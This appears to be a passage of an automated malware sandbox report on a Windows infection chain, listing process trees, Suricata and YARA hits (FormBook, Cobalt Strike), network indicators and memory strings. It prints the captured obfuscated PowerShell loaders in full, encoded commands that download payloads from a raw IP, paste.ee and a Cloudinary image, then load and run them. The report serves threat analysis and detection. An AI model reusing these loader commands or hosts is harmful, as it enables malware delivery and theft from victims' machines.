Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotnet.mdirawrowjhdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.
Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.pdb source: powershell.exe, 00000003.00000002.2228926984.0000000004B67000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2537047764.0000000006C1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2534836877.0000000006790000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: TenantRestrictions\Payload\Local\Temp\zl2mzrqp\zl2mzrqp.pdb source: powershell.exe, 00000003.00000002.2236379284.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2537047764.0000000006C1A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.5:49704 -> 172.245.123.12:80
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.5:49706

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Yara detected Generic Downloader

Source: Yara match

File source: 7.2.powershell.exe.537e4c8.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/et2L1/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 151.101.1.137 151.101.1.137
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 172.245.123.12 172.245.123.12

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49760 -> 104.21.84.67:443

Source: global traffic

HTTP traffic detected: GET /233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.12Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.12

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_04637A18 URLDownloadToFileW,

3_2_04637A18

Source: global traffic	HTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/et2L1/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.12Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee

Source: powershell.exe, 00000003.00000002.2228926984.0000000004B67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.12/233/create
Source: powershell.exe, 00000003.00000002.2228926984.0000000004B67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIF
Source: powershell.exe, 00000003.00000002.2237771463.0000000007D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFGetLMEM
Source: powershell.exe, 00000003.00000002.2237841255.0000000007DBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFll
Source: powershell.exe, 00000003.00000002.2236379284.0000000006FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIFv
Source: powershell.exe, 00000007.00000002.2538077937.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micror
Source: powershell.exe, 00000003.00000002.2228926984.0000000004D80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000003.00000002.2234262230.00000000057A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2228926984.0000000004741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2501733594.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2228926984.0000000004741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2501733594.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dahall/taskscheduler
Source: powershell.exe, 00000003.00000002.2234262230.00000000057A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2501733594.0000000005239000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000007.00000002.2501733594.0000000004327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49760 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"	Jump to behavior
